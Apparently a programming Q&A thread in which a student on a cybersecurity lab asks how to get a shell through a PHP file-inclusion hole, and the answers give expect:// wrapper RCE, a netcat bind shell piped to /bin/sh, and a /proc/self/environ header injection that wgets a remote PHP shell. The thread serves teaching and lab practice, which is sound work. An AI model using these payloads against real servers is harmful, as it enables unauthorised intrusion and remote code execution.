# How to open a shell using LFI or RFI exploits?

Tags: php, exploit

I am completing some online labs to do with cybersecurity and I have been given the task of dealing with a virtual machine of kali linux, to access a basic ip for a website called "yellow". we access it using an ip, our VM does not have an actual internet connection.

Now upon testing for a LFI exploit, there is one, however, it does not do what I want it to do. We are meant to find the token in `http://10.102.x.x/description.php?page=instinct`.            Using this, I changed the `?page=` part to `?page=../../var/www/token.txt`.

When i hit enter to see the web-page i was greeted with the message of "In order to get this token you need to get a shell on the box and run the file you can find in /var/www/".

I have no clue how to get a shell onto this webpage. When I try doing it by putting a file in my vm's directory, with the link sort of looking like "" I am given the following warnings, without an output:

```
Warning: include(http://10.102.x.x/var/www/html/test.txt): failed to open stream: Connection refused in /var/www/html/description.php on line 5

Warning: include(): Failed opening 'http://10.102.x.x/var/www/html/test.txt' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/description.php on line 5
```

description.php has the following code in it:

```
<?php
$image_name = $_GET['page'];

// Get the description from another file
include($image_name);

?>
```

I am specifically told to use a shell, and don't have a way around that. How do i upload a shell and exploit the directory that way?

Comment: What do you mean: _"When I try doing it by putting a file in my vm's directory, with the link sort of looking like ""_? What is  in the file you created in order to include? We can't really see what you have tried without including this.

Comment: The problem appears to be "Connection Refused". Looks like an issue with the webserver you are trying to run from your attack VM.

Answer (score 1):

Using PHP wrappers may do the trick as explained here :
https://offsec.vchur.dk/2019/04/16/local-file-inclusion-lfi/

Here is the example quoted from previous link :

```
http://127.0.0.1/fileincl/example1.php?page=expect://ls
```

Here is an other example (using *inline PHP*) from https://www.php.net/manual/en/expect.examples-usage.php :

```
$stream = fopen("expect://ssh root@remotehost uptime", "r");
```

Once there, you have ability to RCE and thus craft your own (bind) shell, e.g. :

```
# Payload on target
nc -lkp 2222 | /bin/sh
# Locally :
nc 10.102.x.x 2222
```

Note: payload should be URL encoded (e.g. `expect://nc%20-lk...`)

Answer (score -1):

did you tried to look for passwd file, and make connection to the machine and then upload shell ? If not you can use `proc/self/environ` and use temper data to modify your header to something like: `<?system('wget http://site.com/Shells/gny.txt -O shell.php');?>` - This should use the LFI and proc/self/environ to execute the header which is our evil command.

Comment: how do I make connection to the machine? and why do I use that long link?

Comment: This is not a "long link" this is a command that will tell the machine to do this command (get gny.txt and make it to shell.php) - you can do that by modifying your header and if proc/self/environ is availiable it will execute the command..

Comment: so it will look something like "http://10.102.x.x/description.php?page=expect://<?system('wget http://site.com/Shells/gny.txt -O shell.php');?>" ?

Comment: what will happen after doing this?

Comment: I see you are not very familiar with headers." When a web browser make a request it sends information to the server about what it is looking for in headers.When a web browser make a request it sends information to the server about what it is looking for in headers." If you successfully modify the header to this command the proc/self/environ will accept this header and will EXECUTE it.